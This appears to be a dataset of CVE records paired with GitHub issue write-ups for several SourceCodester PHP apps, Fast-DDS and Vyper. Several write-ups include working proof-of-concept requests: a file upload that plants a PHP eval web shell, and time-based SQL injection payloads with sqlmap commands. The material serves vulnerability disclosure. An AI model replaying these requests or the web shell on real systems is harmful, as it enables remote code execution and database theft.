[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.257770" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.257770" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.303123" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.257770" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.257770" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.303123" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ganeshrkt:simple_file_manager_web_app:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3077F229-94E7-49B4-9E8E-A44CB9702353", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CveSecLook/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# Simple File Manager Web App using PHP and MySQL Database Free Source Code - Arbitrary file vulnerability uploading leads to command execution + Author: FanYZ # Vendor Homepage + https://www.sourcecodester.com/upload-download-and-delete-file-using-php-mysql.html # Software Link + https://www.sourcecodester.com/sites/default/files/download/oretnom23/myfilemgr.zip # Overview + FanYZ has discovered a vulnerability classified as critical in Simple File Manager Web App using PHP and MySQL Database Free Source Code. The function upload is affected. This operation will result in unrestricted uploads. Remote attacks can cause RCE. # Vulnerability Details + Simple File Manager Web App using PHP and MySQL Database Free Source Code V1.0 + Vulnerable File: index.php + Parameter Names: filename + Attack Type: Remote # Description + FanYZ has discovered a vulnerability classified as critical in Simple File Manager Web App using PHP and MySQL Database Free Source Code. This issue affects the function upload. The manipulation with an unknown input leads to a unrestricted upload vulnerability. # Note + No need to log in to the website, no interaction required to RCE! # Proof of Concept (PoC) : 0x01 ``` POST / HTTP/1.1 Host: www.myfilemgr.com:8092 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------35394075757009027883742263970 Content-Length: 367 Upgrade-Insecure-Requests: 1 -----------------------------35394075757009027883742263970 Content-Disposition: form-data; name="photo"; filename="shell.php" Content-Type: text/plain <?php @eval($_POST['cmd']); ?> -----------------------------35394075757009027883742263970 Content-Disposition: form-data; name="submit" SUBMIT -----------------------------35394075757009027883742263970-- ``` <img width="1193" alt="2" src="https://github.com/CveSecLook/cve/assets/42730714/f3102a1b-7376-48b8-9fbc-0232cbbf2a02"> 0x02 ``` POST /files/shell.php HTTP/1.1 Host: www.myfilemgr.com:8092 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 14 Connection: close cmd=phpinfo(); ``` <img width="1190" alt="1" src="https://github.com/CveSecLook/cve/assets/42730714/5c404942-8235-44b1-ab00-93c0223f47d7">
Simple File Manager Web App using PHP and MySQL Database Free Source Code - Arbitrary file vulnerability uploading leads to command execution
https://api.github.com/repos/CveSecLook/cve/issues/1/comments
0
2024-03-22T14:51:45Z
2024-03-22T14:51:45Z
https://github.com/CveSecLook/cve/issues/1
2,202,684,616
1
6,013
CVE-2024-2932
2024-03-27T01:15:46.830
A vulnerability classified as critical has been found in SourceCodester Online Chatting System 1.0. Affected is an unknown function of the file admin/update_room.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258012.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.258012" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.258012" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.304257" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.258012" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.258012" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.304257" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:donbermoy:online_chatting_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "85923067-902A-42B7-BB5E-4C6ACE3990C0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# Online Chatting System using PHP/MySQL update_room.php - SQL injection vulnerability + Author: WangPeng CUMT # Vendor Homepage + https://www.sourcecodester.com/php/14224/online-chatting-system-using-phpmysql.html # Software Link + https://www.sourcecodester.com/download-code?nid=14224&title=Online+Chatting+System+using+PHP%2FMySQL # Overview + WangPeng CUMT has discovered that Online Chatting System using PHP/MySQL is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/update_room. php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database. # Vulnerability Details + Online Chatting System using PHP/MySQL V1.0 + Vulnerable File: admin/update_room.php + Parameter Names: id + Attack Type: Remote # Description + WangPeng CUMT has discovered that Online Chatting System using PHP/MySQL is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/update_room.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database. # Proof of Concept (PoC) : + `sqlmap -u 'http://www.onlinechatting.com:8089/admin/update_room.php' -p 'id' --data="id=1"--method='POST'` ``` --- Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: edit=1&id=1' AND (SELECT 9968 FROM (SELECT(SLEEP(5)))Xnth) AND 'Oiis'='Oiis&name=1&pass=1 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) --- ``` <img width="1638" alt="image-1" src="https://github.com/CveSecLook/cve/assets/52342243/e7860867-244a-4975-8a4e-ef41a5d945af"> # POC ``` POST /admin/update_room.php HTTP/1.1 Host: www.onlinechatting.com:8089 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 Content-Type: application/x-www-form-urlencoded Content-Length: 26 edit=1&id=1' AND (SELECT 9968 FROM (SELECT(SLEEP(10)))Xnth) AND 'Oiis'='Oiis&name=1&pass=1 ``` <img width="1501" alt="image" src="https://github.com/CveSecLook/cve/assets/52342243/35528787-c6c1-4345-bcf8-175b7a72e13e">
Online Chatting System using PHP/MySQL update_room.php - SQL injection vulnerability
https://api.github.com/repos/CveSecLook/cve/issues/3/comments
0
2024-03-25T20:14:01Z
2024-03-25T20:14:01Z
https://github.com/CveSecLook/cve/issues/3
2,206,616,626
3
6,014
CVE-2024-31506
2024-04-09T18:15:10.467
Sourcecodester Online Graduate Tracer System v1.0 is vulnerable to SQL Injection via the "id" parameter in admin/admin_cs.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tamparongj03:online_graduate_tracer_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "48BB2CA2-9E7E-4C08-B25E-7377696BF3B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0 admin/admin_cs.php - SQL injection vulnerability + Author: zhang guixiang # Vendor Homepage + https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html # Software Link + https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip # Overview + zhang guixiang has discovered that Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/admin_cs.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database. # Vulnerability Details + Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0 + Vulnerable File: admin/admin_cs.php + Parameter Names: id + Attack Type: Remote # Description + zhang guixiang has discovered that Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/admin_cs.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database. # Proof of Concept (PoC) : + `sqlmap -u "www.tracking.com:8098/admin/admin_cs.php?id=1" -p id --dbms=mysql -v 3` ``` --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(5)))ansi) AND 'Pxda'='Pxda Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) --- ``` <img width="1639" alt="1" src="https://github.com/CveSecLook/cve/assets/52342243/baa23a06-d8c5-4ea0-9391-db06593538f4"> # Burp Suite (POC): ``` GET /admin/admin_cs.php?id=id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(10)))ansi) AND 'Pxda'='Pxda HTTP/1.1 Host: www.tracking.com:8098 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ``` <img width="1500" alt="2" src="https://github.com/CveSecLook/cve/assets/52342243/2417a0f2-92c8-4113-969b-669e06cb1f0b">
Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0 admin/admin_cs.php - SQL injection vulnerability
https://api.github.com/repos/CveSecLook/cve/issues/4/comments
0
2024-03-27T16:28:13Z
2024-03-28T16:31:03Z
https://github.com/CveSecLook/cve/issues/4
2,211,250,054
4
6,015
CVE-2024-30916
2024-04-11T06:15:07.030
An issue was discovered in eProsima FastDDS v.2.14.0 and before, allows a local attacker to cause a denial of service (DoS) and obtain sensitive information via a crafted max_samples parameter in DurabilityService QoS component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 4, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 2.5, "impactScore": 1.4, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/eProsima/Fast-DDS/issues/4609" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/eProsima/Fast-DDS/issues/4609" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eprosima:fast_dds:*:*:*:*:*:*:*:*", "matchCriteriaId": "73596FAC-A0D1-4AC6-BB80-C9459B1EA433", "versionEndExcluding": null, "versionEndIncluding": "2.14.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/eProsima/Fast-DDS/issues/4609
[ "Exploit", "Issue Tracking" ]
github.com
[ "eProsima", "Fast-DDS" ]
### Is there an already existing issue for this? - [X] I have searched the existing issues ### Expected behavior When setting history_depth = 0 or max_samples = 0 in DurabilityService QoS, return bad parameter or inform inconsistent QoS. ### Current behavior Despite inconsistent QoS settings, datareader, datawriter and topic are created normally. ### Steps to reproduce It is inconsistent if `max_samples < (max_instances * max_samples_per_instance)` . But when setting max_instances=0 or history_depth=0, Despite inconsistent QoS settings, datareader, datawriter and topic are created normally. Insert the following code in HelloWorldSubscriber.cpp in HelloWorldExample. ```cpp // Creating DataReader QoS like this caused error. DataReaderQos rqos = DATAREADER_QOS_DEFAULT; rqos.durability_service().history_depth = 0; rqos.durability_service().max_samples = 0; DataWriterQos rqos = DATAWRITER_QOS_DEFAULT; rqos.durability_service().history_depth = 0; rqos.durability_service().max_samples = 0; TopicQoS tqos = TOPIC_QOS_DEFAULT; tqos.durability_service().history_depth = 0; tqos.durability_service().max_samples = 0; ``` ### Fast DDS version/commit `Fast-DDS v2.11.2`, but I think it's going to happen in the latest version, too ### Platform/Architecture Ubuntu Focal 20.04 amd64 ### Transport layer Default configuration, UDPv4 & SHM, Intra-process ### Additional context This issue is similar with #4574. This is an issue in eProsima FastDDS v.2.14.0 and before allows a local attacker to obtain sensitive information via the history_depth component. ### XML configuration file _No response_ ### Relevant log output _No response_ ### Network traffic capture _No response_
Allow inconsistent about DurabilityService QoS
https://api.github.com/repos/eProsima/Fast-DDS/issues/4609/comments
1
2024-03-22T20:41:06Z
2024-04-05T20:09:51Z
https://github.com/eProsima/Fast-DDS/issues/4609
2,203,278,979
4,609
6,016
CVE-2024-3948
2024-04-18T11:15:39.300
A vulnerability was found in SourceCodester Home Clean Service System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file \admin\student.add.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261440.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuanluansec/vul/issues/5" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.261440" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.261440" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.318722" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuanluansec/vul/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.261440" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.261440" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.318722" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:library_system_project:library_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AD9DDE89-9456-4FAB-B277-1F80D6D9EDBC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/xuanluansec/vul/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xuanluansec", "vul" ]
# SourceCodester Home Clean Service System in PHP Free Source Code 1.0 student_add.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Library System using PHP/MySQli with Source Code ## Vendor Homepage + https://www.sourcecodester.com/php/12275/library-system-using-php.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + fengxiangdi ## Vulnerable File + student_add.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + The input obtained from line 8 of the \admin\student.add.php file is used to determine the location of the file to be written, which may allow attackers to modify or damage the content of the file, or create a brand new file. + ![3](https://github.com/xuanluansec/vul/assets/92671097/59e197c6-6dc6-4df8-8fc5-6306c81e2da5) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE. # DESCRIPTION + Fengxiangdi found that the file upload operation was triggered in student.add.php, and the _FAILE variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE. # Vulnerability details and POC ## Payload + The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly. + ![5](https://github.com/xuanluansec/vul/assets/92671097/f6301451-e17a-4cfc-aa49-35fa06127819) ``` POST /admin/student_add.php HTTP/1.1 Host: localhost Content-Length: 2498 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://www.libsystem.com:8103 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryofX7Z9Ez1nJnPqJ5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://www.libsystem.com:8103/admin/student.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5 Content-Disposition: form-data; name="firstname" www ------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5 Content-Disposition: form-data; name="lastname" www ------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5 Content-Disposition: form-data; name="course" 2 ------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5 Content-Disposition: form-data; name="photo"; filename="rce.php" Content-Type: image/jpeg Node:Sorry, due to some coding reasons, I am unable to use markdown to store image data with attack payloads here. ------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5 Content-Disposition: form-data; name="add" ------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5-- ``` + I successfully connected using shell tools + ![1](https://github.com/xuanluansec/vul/assets/92671097/80fc6d8f-c100-48c7-9e5e-869a31528486) + I successfully executed the ipconfig command using shell tools + ![4](https://github.com/xuanluansec/vul/assets/92671097/26892c29-f8b4-4ae4-879b-0f40f34732a2)
SourceCodester Home Clean Service System in PHP Free Source Code 1.0 student_add.php Unrestricted Upload
https://api.github.com/repos/xuanluansec/vul/issues/5/comments
0
2024-04-17T17:10:01Z
2024-04-17T17:10:01Z
https://github.com/xuanluansec/vul/issues/5
2,248,786,611
5
6,017
CVE-2024-32648
2024-04-25T18:15:09.157
Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. Prior to version 0.3.0, default functions don't respect nonreentrancy keys and the lock isn't emitted. No vulnerable production contracts were found. Additionally, using a lock on a `default` function is a very sparsely used pattern. As such, the impact is low. Version 0.3.0 contains a patch for the issue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/vyperlang/vyper/commit/93287e5ac184b53b395c907d40701f721daf8177" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/vyperlang/vyper/issues/2455" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-m2v9-w374-5hj9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/vyperlang/vyper/commit/93287e5ac184b53b395c907d40701f721daf8177" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/vyperlang/vyper/issues/2455" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-m2v9-w374-5hj9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vyperlang:vyper:*:*:*:*:*:python:*:*", "matchCriteriaId": "65F778D8-E42E-4CDB-BF02-9406D65FD6B6", "versionEndExcluding": "0.3.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "667" ]
667
https://github.com/vyperlang/vyper/issues/2455
[ "Issue Tracking" ]
github.com
[ "vyperlang", "vyper" ]
### Version Information * vyper Version (output of `vyper --version`): v0.2.16 nonreentrant keys are allowed on default functions, e.g. ```python @external @payable @nonreentrant("default") def __default__(): pass ``` but it doesn't do anything, here's the output: ``` [seq, [if, [lt, calldatasize, 4], [goto, fallback]], [mstore, 28, [calldataload, 0]], [with, _func_sig, [mload, 0], seq], [seq_unchecked, [label, fallback], [seq, pass, # Line 5 pass, pass, # Line 4 stop]]], ```
default functions don't respect nonreentrancy keys
https://api.github.com/repos/vyperlang/vyper/issues/2455/comments
1
2021-09-10T02:33:40Z
2021-10-04T20:14:05Z
https://github.com/vyperlang/vyper/issues/2455
992,830,789
2,455
6,018
CVE-2024-4809
2024-05-14T15:44:59.720
A vulnerability has been found in SourceCodester Open Source Clinic Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file setting.php. The manipulation of the argument logo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263929 was assigned to this vulnerability.
